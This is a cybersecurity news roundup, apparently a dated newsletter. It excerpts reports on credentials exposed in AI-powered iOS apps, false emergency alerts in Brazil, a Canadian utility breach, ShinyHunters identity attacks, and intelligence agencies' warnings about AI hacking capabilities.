Hundreds Of AI-Powered iOS Apps Found Exposing Credentials
"Mobile app developers are packing AI features into everything from writing assistants to productivity tools and lifestyle apps. New research shows that securing access to those services remains a challenge. Researchers from Wake Forest University analyzed 444 iOS applications with LLM features and found 282 that exposed exploitable credentials or backend access mechanisms. The affected apps covered 13 categories, including productivity, entertainment, lifestyle, education, utilities, and health and fitness. LLM-powered applications reached 17 billion downloads in 2025 and accounted for 13% of all mobile app downloads."
https://www.helpnetsecurity.com/2026/06/22/llm-api-credential-leakage-ios-apps/
https://arxiv.org/pdf/2606.12212
Suspected Cyberattack Triggers False Emergency Alerts Across Parts Of Brazil
"Brazil suspended its mobile phone emergency alert system after a suspected cyberattack triggered false warnings on phones across several states. The incident occurred early Saturday when at least a dozen unauthorized alerts were sent through Brazil's Civil Defense Alert system, a platform designed to warn residents about imminent threats such as floods, landslides and other natural disasters."
https://therecord.media/suspected-cyberattack-triggers-false-emergency-alerts-brazil
https://www.theregister.com/security/2026/06/22/brazil-begins-investigating-emergency-alert-system-breach/5259421
Canadian Utility Fesses Up To Data Breach, But Key Details Remain Off-Grid
"A Canadian power utility says customer data may have walked out the door during a security incident, but isn't yet saying whether the intruders got anywhere near the systems responsible for keeping the lights on. London Hydro, which distributes electricity to more than 160,000 customers in and around London, Ontario, said on Saturday that it is investigating a data security incident that "may have impacted a portion of personal information on some accounts" and has started notifying affected customers."
https://www.theregister.com/security/2026/06/22/canadian-utility-fesses-up-to-data-breach-but-key-details-remain-off-grid/5259309

General News

Who Pays When You Gate Cyber-Capable AI Models?
"In this interview with Help Net Security, Jaya Baloo, COO & CISO at Aisle, examines the debate over restricting access to cyber-capable AI models. She lays out the strongest argument for gating these tools, then explains where it breaks down for security teams who depend on the same capabilities for defense. Baloo argues that policymakers misread how attackers and defenders operate, that open-weight models cut both ways, and that limiting access can widen the gap between well-resourced organizations and everyone else."
https://www.helpnetsecurity.com/2026/06/22/jaya-baloo-aisle-gating-cyber-capable-ai-models/
Encrypted DNS Still Tells An Eavesdropper Where To Look
"Encrypted DNS runs across much of the Internet. DNS over TLS, HTTPS, and QUIC keep the contents of a query away from anyone watching a network link. The encryption covers the message inside each packet. The packet still carries plaintext headers, and those values mark a flow as DNS. A new study measures this gap for the Internet of Things and offers a way to close part of it."
https://www.helpnetsecurity.com/2026/06/22/research-encrypted-dns-privacy/
https://arxiv.org/pdf/2606.10097
What The Latest ShinyHunters Breaches Reveal About Modern Cyberattacks
"The latest wave of breaches attributed to the ShinyHunters cybercrime collective (e.g., University of Nottingham, DentaQuest, 7-Eleven, Medtronic, and Wynn Resorts), reinforces a hard truth security leaders can no longer ignore: attackers are increasingly bypassing traditional perimeter defenses and targeting identities, authentication workflows, SaaS integrations, and trusted access paths instead of exploiting software vulnerabilities directly. Over the past several months, ShinyHunters has been linked to attacks involving Salesforce environments, Snowflake customers, SaaS integrations, and identity platforms such as Okta. Researchers and incident responders have consistently observed the same pattern: stolen credentials, compromised OAuth tokens, social engineering, vishing, and abuse of legitimate access privileges."
https://www.securityweek.com/what-the-latest-shinyhunters-breaches-reveal-about-modern-cyberattacks/
Stop Your Legacy Infrastructure From Hijacking Your AI Agents
"Earlier this month, I spoke at the Gartner Security & Risk Management Summit about a blind spot most security programs are still not accounting for - how attackers are circumventing AI security programs by using legacy infrastructure to hijack AI agents. AI adoption is moving faster than security programs can account for. Roughly 71% of organizations are piloting AI agents across their enterprise applications, and 31% have already moved them into production workflows."
https://thehackernews.com/2026/06/stop-your-legacy-infrastructure-from.html
Canada’s Spy Agency Used First-Of-Its-Kind Warrant To Clean Botnet-Infected Devices
"Canada's spy service got a judge's permission to reach into infected servers, home routers, and IoT gear sitting on Canadian soil and neutralize two foreign-run botnets. The Federal Court released a public version of the ruling on June 15. It is the first time the Canadian Security Intelligence Service has used its threat reduction warrant powers this way. The warrant let CSIS alter, degrade, and destroy botnet data on the infected machines and cut the devices loose from the networks."
https://thehackernews.com/2026/06/canadas-spy-agency-used-first-of-its.html
https://www.fct-cf.ca/en/pages/media/news-bulletins/file-c-6-24
Intel Agencies: Frontier AI Models Will Reshape Cybersecurity Faster Than Expected
"Intelligence agencies for the United States, Canada, UK, Australia and New Zealand are warning that advanced AI models capable of wreaking havoc in the cyber domain are “months away” from being publicly available. In a joint statement, the Five Eyes alliance say they expect the kind of advanced hacking capabilities provided by frontier models like Anthropic’s Fable 5 and OpenAI’s Daybreak to become broadly available the public within the year, despite efforts by AI companies to withhold them or restrict their access."
https://cyberscoop.com/five-eyes-alliance-say-advanced-ai-hacking-models-months-away/